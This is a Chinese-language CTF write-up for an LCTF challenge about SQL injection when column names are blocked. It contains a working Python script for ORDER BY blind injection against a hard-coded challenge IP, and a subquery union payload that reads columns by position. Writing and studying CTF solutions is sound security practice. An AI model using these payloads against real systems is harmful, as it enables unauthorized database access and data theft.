在LCTF 上的一道他们有什么秘密呢， 自己没有做出来，但看了大佬们的wp后颇有收获，自己总结汇总下大佬们的思路，以供参考

该题有很多坑点，报错注入出表名，列名这部分暂且不说，也算是一个很好的知识点，这里总结下在列名被禁用的情况下如何注入出数据的两个tricks

1. order by 盲注

payload:

union select 1,2,3,0x{} order by 4%23

0x{}是我们的payload, 原理是利用order by 让第四个列的值和我们的payload进行字符比较来盲注，脚本如下：

#!/usr/bin/env python
#coding:utf-8
import requests
import urllib

url = "http://182.254.246.93/entrance.php"
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'}
#hex_s = '  !"#$%&`()*+,-./0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz{}~'
hex_s = ["20","21","22","23","24","25","26","27","28","29","2A","2B","2C","2D","2E","2F","30","31","32","33","34","35","36","37","38","39","3A","3B","3C","3C","3D","3E","3F","40","41","42","43","44","45","46","47","48","49","4A","4B","4C","4D","4E","4F","50","51","52","53","54","55","56","57","58","59","5A","5B","5C","5D","5E","5F","60","61","62","63","64","65","66","67","68","69","6A","6B","6C","6D","6E","6F","70","71","72","73","74","75","76","77","78","79","7A","7B","7D","7E","7F"]
old_char = ''
payload = "3 union select 1,2,3,binary(0x{}) order by 4"

def access(p):
    param = payload.format(old_char+p)
    data = {
        'pro_id':urllib.unquote(param)
    }
    res = requests.post(url,data=data).content
    # print param
    # print data
    # print res
    if ':2' in res:  
        return True
    else:
        return False
    

def erfen():
    global old_char
    for y in hex_s:
        l = 0
        r = len(hex_s)
        while l<r:
            mid = (l+r)/2
            if access(hex_s[mid]): # 
                l = mid+1
            else:
                r = mid
        old_char += hex_s[l-1]
        #print l
        if l > 94:
            return old_char[:-2].decode('hex')
            break
        print 'data => ',old_char.decode('hex')

if __name__ == '__main__':
    s = erfen()
    print 'flag:',s[:-1]+chr(ord(s[-1])+1)

2 子查询

payload:

pro_id=-1 union select 1,(select e.4 from (select * from (select 1,2,3,4)c union select * from product_2017ctf limit 1 offset 3)e),3,4

(select e.4 from (select * from (select 1,2,3,4)c union select * from product_2017ctf limit 1 offset 3)e) //e.1,e.2,e.3分别可以查询出第一列，第二列，第三列的数据

查询出来后，我们就可以把我们查询的数据利用union联合查询插入到显位上去, 这种方法虽然简便，但其实很容易被ban, 本题的waf只是比较少的关键字，因此可以用这种方法注入出数据